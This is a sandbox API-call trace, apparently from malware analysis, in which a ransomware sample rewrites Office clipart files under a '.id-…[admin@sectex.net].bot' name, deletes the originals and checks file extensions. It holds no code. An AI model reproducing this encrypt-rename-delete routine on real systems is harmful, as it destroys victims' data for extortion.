	[0147.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01176_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0147.049] GetLastError () returned 0x0
	[0147.049] ReadFile (in: hFile=0x2a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1378, lpOverlapped=0x0) returned 1
	[0147.073] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1380, lpOverlapped=0x0) returned 1
	[0147.074] ReadFile (in: hFile=0x2a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.074] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.074] SetEndOfFile (hFile=0x3b8) returned 1
	[0147.074] CloseHandle (hObject=0x3b8) returned 1
	[0147.074] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.074] SetEndOfFile (hFile=0x2a0) returned 1
	[0147.076] CloseHandle (hObject=0x2a0) returned 1
	[0147.076] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.086] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01176_.wmf")) returned 1
	[0147.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63
	[0147.086] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63
	[0147.086] lstrlenW (lpString=".doc") returned 4
	[0147.086] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.086] lstrlenW (lpString=".docx") returned 5
	[0147.087] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.087] lstrlenW (lpString=".pdf") returned 4
	[0147.087] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.087] lstrlenW (lpString=".xls") returned 4
	[0147.087] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.087] lstrlenW (lpString=".xlsx") returned 5
	[0147.087] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.087] lstrlenW (lpString=".ppt") returned 4
	[0147.087] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63
	[0147.087] lstrlenW (lpString=".zip") returned 4
	[0147.087] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.087] lstrlenW (lpString=".rar") returned 4
	[0147.087] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.087] lstrlenW (lpString=".bz2") returned 4
	[0147.087] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.087] lstrlenW (lpString=".7z") returned 3
	[0147.087] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63
	[0147.087] lstrlenW (lpString=".dbf") returned 4
	[0147.087] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63
	[0147.087] lstrlenW (lpString=".1cd") returned 4
	[0147.087] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63
	[0147.087] lstrlenW (lpString=".jpg") returned 4
	[0147.087] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63
	[0147.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63
	[0147.087] lstrlenW (lpString=".doc") returned 4
	[0147.087] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.088] lstrlenW (lpString=".docx") returned 5
	[0147.088] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.088] lstrlenW (lpString=".pdf") returned 4
	[0147.088] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.088] lstrlenW (lpString=".xls") returned 4
	[0147.088] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.088] lstrlenW (lpString=".xlsx") returned 5
	[0147.088] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.088] lstrlenW (lpString=".ppt") returned 4
	[0147.088] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63
	[0147.088] lstrlenW (lpString=".zip") returned 4
	[0147.088] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.088] lstrlenW (lpString=".rar") returned 4
	[0147.088] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.088] lstrlenW (lpString=".bz2") returned 4
	[0147.088] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.088] lstrlenW (lpString=".7z") returned 3
	[0147.088] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63
	[0147.088] lstrlenW (lpString=".dbf") returned 4
	[0147.088] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63
	[0147.088] lstrlenW (lpString=".1cd") returned 4
	[0147.088] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01176_.WMF") returned 63
	[0147.088] lstrlenW (lpString=".jpg") returned 4
	[0147.088] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.089] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.089] lstrlenW (lpString="FD01196_.WMF") returned 12
	[0147.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01196_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.089] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=2332) returned 1
	[0147.089] CloseHandle (hObject=0x31c) returned 1
	[0147.089] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01196_.wmf")) returned 0x20
	[0147.089] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01196_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01196_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.090] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.090] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01196_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0147.090] GetLastError () returned 0x0
	[0147.090] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x91c, lpOverlapped=0x0) returned 1
	[0147.129] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x920, lpOverlapped=0x0) returned 1
	[0147.130] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.130] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.130] SetEndOfFile (hFile=0x38c) returned 1
	[0147.130] CloseHandle (hObject=0x38c) returned 1
	[0147.130] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.130] SetEndOfFile (hFile=0x31c) returned 1
	[0147.136] CloseHandle (hObject=0x31c) returned 1
	[0147.136] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.136] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01196_.wmf")) returned 1
	[0147.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63
	[0147.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63
	[0147.137] lstrlenW (lpString=".doc") returned 4
	[0147.137] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.137] lstrlenW (lpString=".docx") returned 5
	[0147.137] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.137] lstrlenW (lpString=".pdf") returned 4
	[0147.137] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.137] lstrlenW (lpString=".xls") returned 4
	[0147.137] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.137] lstrlenW (lpString=".xlsx") returned 5
	[0147.137] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.137] lstrlenW (lpString=".ppt") returned 4
	[0147.137] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63
	[0147.137] lstrlenW (lpString=".zip") returned 4
	[0147.137] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.137] lstrlenW (lpString=".rar") returned 4
	[0147.137] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.137] lstrlenW (lpString=".bz2") returned 4
	[0147.137] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.137] lstrlenW (lpString=".7z") returned 3
	[0147.137] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63
	[0147.137] lstrlenW (lpString=".dbf") returned 4
	[0147.137] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63
	[0147.137] lstrlenW (lpString=".1cd") returned 4
	[0147.137] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63
	[0147.137] lstrlenW (lpString=".jpg") returned 4
	[0147.137] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63
	[0147.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63
	[0147.138] lstrlenW (lpString=".doc") returned 4
	[0147.138] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.138] lstrlenW (lpString=".docx") returned 5
	[0147.138] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.138] lstrlenW (lpString=".pdf") returned 4
	[0147.138] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.138] lstrlenW (lpString=".xls") returned 4
	[0147.138] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.138] lstrlenW (lpString=".xlsx") returned 5
	[0147.138] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.138] lstrlenW (lpString=".ppt") returned 4
	[0147.138] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63
	[0147.138] lstrlenW (lpString=".zip") returned 4
	[0147.138] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.138] lstrlenW (lpString=".rar") returned 4
	[0147.138] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.138] lstrlenW (lpString=".bz2") returned 4
	[0147.138] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.138] lstrlenW (lpString=".7z") returned 3
	[0147.138] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63
	[0147.138] lstrlenW (lpString=".dbf") returned 4
	[0147.138] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63
	[0147.138] lstrlenW (lpString=".1cd") returned 4
	[0147.138] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01196_.WMF") returned 63
	[0147.138] lstrlenW (lpString=".jpg") returned 4
	[0147.138] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.139] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.139] lstrlenW (lpString="FD01657_.WMF") returned 12
	[0147.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01657_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.139] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=30414) returned 1
	[0147.139] CloseHandle (hObject=0x31c) returned 1
	[0147.139] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01657_.wmf")) returned 0x20
	[0147.139] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01657_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01657_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.140] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.140] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01657_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0147.140] GetLastError () returned 0x0
	[0147.140] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x76ce, lpOverlapped=0x0) returned 1
	[0147.156] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x76d0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x76d0, lpOverlapped=0x0) returned 1
	[0147.158] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.158] WriteFile (in: hFile=0x38c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.158] SetEndOfFile (hFile=0x38c) returned 1
	[0147.158] CloseHandle (hObject=0x38c) returned 1
	[0147.158] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.158] SetEndOfFile (hFile=0x31c) returned 1
	[0147.160] CloseHandle (hObject=0x31c) returned 1
	[0147.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.164] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01657_.wmf")) returned 1
	[0147.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63
	[0147.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63
	[0147.190] lstrlenW (lpString=".doc") returned 4
	[0147.190] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.190] lstrlenW (lpString=".docx") returned 5
	[0147.190] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.190] lstrlenW (lpString=".pdf") returned 4
	[0147.190] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.190] lstrlenW (lpString=".xls") returned 4
	[0147.190] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.190] lstrlenW (lpString=".xlsx") returned 5
	[0147.190] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.190] lstrlenW (lpString=".ppt") returned 4
	[0147.190] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63
	[0147.190] lstrlenW (lpString=".zip") returned 4
	[0147.190] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.190] lstrlenW (lpString=".rar") returned 4
	[0147.190] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.190] lstrlenW (lpString=".bz2") returned 4
	[0147.191] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.191] lstrlenW (lpString=".7z") returned 3
	[0147.191] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63
	[0147.191] lstrlenW (lpString=".dbf") returned 4
	[0147.191] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63
	[0147.191] lstrlenW (lpString=".1cd") returned 4
	[0147.191] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63
	[0147.191] lstrlenW (lpString=".jpg") returned 4
	[0147.191] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63
	[0147.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63
	[0147.191] lstrlenW (lpString=".doc") returned 4
	[0147.191] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.191] lstrlenW (lpString=".docx") returned 5
	[0147.191] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.191] lstrlenW (lpString=".pdf") returned 4
	[0147.191] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.191] lstrlenW (lpString=".xls") returned 4
	[0147.191] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.191] lstrlenW (lpString=".xlsx") returned 5
	[0147.191] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.191] lstrlenW (lpString=".ppt") returned 4
	[0147.191] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63
	[0147.191] lstrlenW (lpString=".zip") returned 4
	[0147.191] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.191] lstrlenW (lpString=".rar") returned 4
	[0147.191] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.191] lstrlenW (lpString=".bz2") returned 4
	[0147.192] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.192] lstrlenW (lpString=".7z") returned 3
	[0147.192] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63
	[0147.192] lstrlenW (lpString=".dbf") returned 4
	[0147.192] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63
	[0147.192] lstrlenW (lpString=".1cd") returned 4
	[0147.192] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.192] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 63
	[0147.192] lstrlenW (lpString=".jpg") returned 4
	[0147.192] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.192] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.192] lstrlenW (lpString="FD02071_.WMF") returned 12
	[0147.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02071_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.193] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=2188) returned 1
	[0147.193] CloseHandle (hObject=0x384) returned 1
	[0147.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02071_.wmf")) returned 0x20
	[0147.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02071_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02071_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.193] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.193] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
